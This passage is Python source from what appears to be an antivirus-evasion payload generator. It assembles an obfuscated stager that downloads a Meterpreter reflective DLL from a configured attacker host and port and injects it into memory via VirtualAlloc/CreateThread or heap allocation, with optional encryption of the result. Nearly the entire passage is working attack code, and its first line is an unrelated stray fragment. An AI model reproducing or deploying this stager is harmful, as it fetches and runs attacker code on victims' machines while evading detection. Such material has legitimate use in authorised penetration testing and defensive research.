gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # helper method that returns the sum of all ord values in a string % 0x100 payload_code += '\t' * num_tabs_required + "def " + sumMethodName + "(s): return sum([ord(ch) for ch in s]) % 0x100\n" # method that generates a new checksum value for checkin to the meterpreter handler payload_code += '\t' * num_tabs_required + "def " + checkinMethodName + "():\n\tfor x in range(64):\n" payload_code += '\t' * num_tabs_required + "\t\t" + randBaseName + " = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" payload_code += '\t' * num_tabs_required + "\t\t" + randLettersName + " = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" payload_code += '\t' * num_tabs_required + "\t\tfor " + randLetterSubName + " in " + randLettersName + ":\n" payload_code += '\t' * num_tabs_required + "\t\t\tif " + sumMethodName + "(" + randBaseName + " + " + randLetterSubName + ") == 92: return " + randBaseName + " + " + randLetterSubName + "\n" # method that connects to a host/port over http and downloads the hosted data payload_code += '\t' * num_tabs_required + "def " + downloadMethodName + "(" + hostName + ", " + portName + "):\n" payload_code += '\t' * num_tabs_required + "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n" payload_code += '\t' * num_tabs_required + "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n" payload_code += '\t' * num_tabs_required + "\turllib.request.install_opener(" + opener_var + ")\n" payload_code += '\t' * num_tabs_required + "\t" + requestName + " = urllib.request.Request(\"http://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" payload_code += '\t' * num_tabs_required + "\ttry:\n" payload_code += '\t' * num_tabs_required + "\t\t" + tName + " = urllib.request.urlopen(" + requestName + ")\n" payload_code += '\t' * num_tabs_required + "\t\ttry:\n" payload_code += '\t' * num_tabs_required + "\t\t\tif int(" + tName + ".info()[\"Content-Length\"]) > 100000: return " + tName + ".read()\n" payload_code += '\t' * num_tabs_required + "\t\t\telse: return ''\n" payload_code += '\t' * num_tabs_required + "\t\texcept: return " + tName + ".read()\n" payload_code += '\t' * num_tabs_required + "\texcept urllib.request.URLError:\n" payload_code += '\t' * num_tabs_required + "\t\treturn ''\n" # method to inject a reflective .dll into memory payload_code += '\t' * num_tabs_required + "def " + injectMethodName + "(" + dataName + "):\n" payload_code += '\t' * num_tabs_required + "\tif " + dataName + " != \"\":\n" payload_code += '\t' * num_tabs_required + "\t\t" + byteArrayName + " = bytearray(" + dataName + ")\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n" payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n" payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n" # Assuming heap injection else: HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n' # download the metpreter .dll and inject it payload_code += '\t' * num_tabs_required + data2Name + " = ''\n" payload_code += '\t' * num_tabs_required + data2Name + " = " + downloadMethodName + "(\"" + self.required_options["LHOST"][0] + "\", " + str(self.required_options["LPORT"][0]) + ")\n" payload_code += '\t' * num_tabs_required + injectMethodName + "(" + data2Name + ")\n" if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return